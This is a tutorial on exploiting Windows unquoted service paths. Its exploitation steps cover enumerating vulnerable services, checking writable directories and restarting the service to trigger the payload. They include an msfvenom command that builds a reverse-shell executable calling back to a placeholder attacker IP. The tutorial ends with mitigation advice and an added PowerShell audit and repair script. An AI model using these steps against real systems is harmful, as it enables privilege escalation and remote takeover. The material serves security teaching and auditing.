Service Exploits - Unquoted Service Path
Unquoted Service Path
Unquoted Service Path is a common misconfiguration in Windows services where the executable’s file path is not enclosed in quotes. If the path contains spaces and lacks quotes, attackers can exploit this to execute malicious programs by placing executables in specific locations along the path.
How It Works
- When a service’s binary path contains spaces and is not enclosed in quotes, Windows tries to locate the executable by interpreting the path in segments.
- For example, if the binary path is:
C:\Program Files\Service Directory\service.exe
Without quotes, Windows will check:
C:\Program.exe
C:\Program Files\Service.exe
C:\Program Files\Service Directory\service.exe
If an attacker can place a malicious executable (Program.exe or Service.exe) in one of the preceding locations and the service runs with high privileges (e.g., SYSTEM), the malicious file will execute instead.
Steps to Exploit Unquoted Service Path
1. Enumerate Services
Identify services with unquoted paths using wmic, sc.exe or PowerShell, for example:
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Look for paths without quotes, especially those containing spaces.
2. Verify Permissions
Ensure you can write to a directory along the service’s path. Use icacls to check permissions:
icacls "C:\Program Files\Unquoted Path Service"
Running the command produces output similar to this:
C:\Program Files\Unquoted Path Service\
BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)
NT AUTHORITY\Authenticated Users:(M)
- BUILTIN\Administrators:(F): Full control for administrators.
- NT AUTHORITY\SYSTEM:(F): Full control for the SYSTEM user.
- BUILTIN\Users:(RX): Read and execute permissions for standard users.
- NT AUTHORITY\Authenticated Users:(M): Modify permissions for authenticated users.
If a low-privileged user or group (e.g., BUILTIN\Users or Everyone) has Modify (M) or Write (W) permissions on the directory, you can exploit it by adding a malicious executable.
Alternatively, check the permissions with accesschk.exe:
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
Use sc qc with the service name (not the path) to find the START_TYPE, SERVICE_START_NAME and BINARY_PATH_NAME:
sc qc "<service-name>"
3. Create a Malicious Executable
Generate a malicious payload (e.g., using msfvenom or msfconsole) and name it to match the segment you want to exploit:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f exe -o Program.exe
Place the malicious executable in the writable directory.
4. Restart the Service
Restart the vulnerable service to trigger the exploit:
net stop <service-name>
net start <service-name>
Upon restarting, the malicious executable will execute with the service’s privileges.
Mitigation
To prevent this vulnerability:
- Always enclose service binary paths in quotes.
- Regularly audit services for unquoted paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
- Limit write permissions on directories along the service paths.
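The following PowerShell audit script is an added example, not part of the original page: it enumerates services whose unquoted binary path contains spaces, derives each intermediate path Windows would probe (as described in "How It Works"), reports which broad groups hold Write or Modify on the corresponding directory, and includes a helper that rewrites the service's ImagePath with quotes. The function names and the list of "broad" groups are my own choices; the C:\Windows exclusion mirrors the page's wmic filter.

```powershell
function Test-BroadWriteAccess([string]$Dir) {
    # Returns the broad (low-privilege) groups that hold Write or Modify on $Dir.
    if (-not (Test-Path -LiteralPath $Dir)) { return @() }
    $broad = 'BUILTIN\Users', 'Everyone',
             'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    $mask = [System.Security.AccessControl.FileSystemRights]'Write, Modify'
    (Get-Acl -LiteralPath $Dir).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $broad -contains $_.IdentityReference.Value -and
                       ([int]($_.FileSystemRights -band $mask) -ne 0) } |
        ForEach-Object { $_.IdentityReference.Value }
}

function Get-UnquotedServicePaths {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        # Empty or already quoted paths are not affected.
        if (-not $path -or $path.StartsWith('"')) { return }
        # Keep only the executable part; anything after ".exe" is arguments.
        $m   = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        if ($exe -notmatch ' ' -or $exe -like 'C:\Windows\*') { return }
        # Windows tries each space-delimited prefix as "<prefix>.exe" before the real binary.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $cand = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service    = $svc.Name
                RunsAs     = $svc.StartName
                StartMode  = $svc.StartMode
                ImagePath  = $path
                Candidate  = $cand
                WritableBy = (Test-BroadWriteAccess (Split-Path $cand -Parent)) -join '; '
            }
        }
    }
}

function Repair-ServicePath([string]$Name, [string]$ExePath, [string]$Arguments) {
    # Remediation: rewrite the service's ImagePath with the executable quoted (needs admin).
    $new = '"' + $ExePath + '"' + $(if ($Arguments) { ' ' + $Arguments } else { '' })
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name" `
                     -Name ImagePath -Value $new
}

# Any row with a non-empty WritableBy column is a service to fix with Repair-ServicePath.
Get-UnquotedServicePaths | Format-Table -AutoSize
```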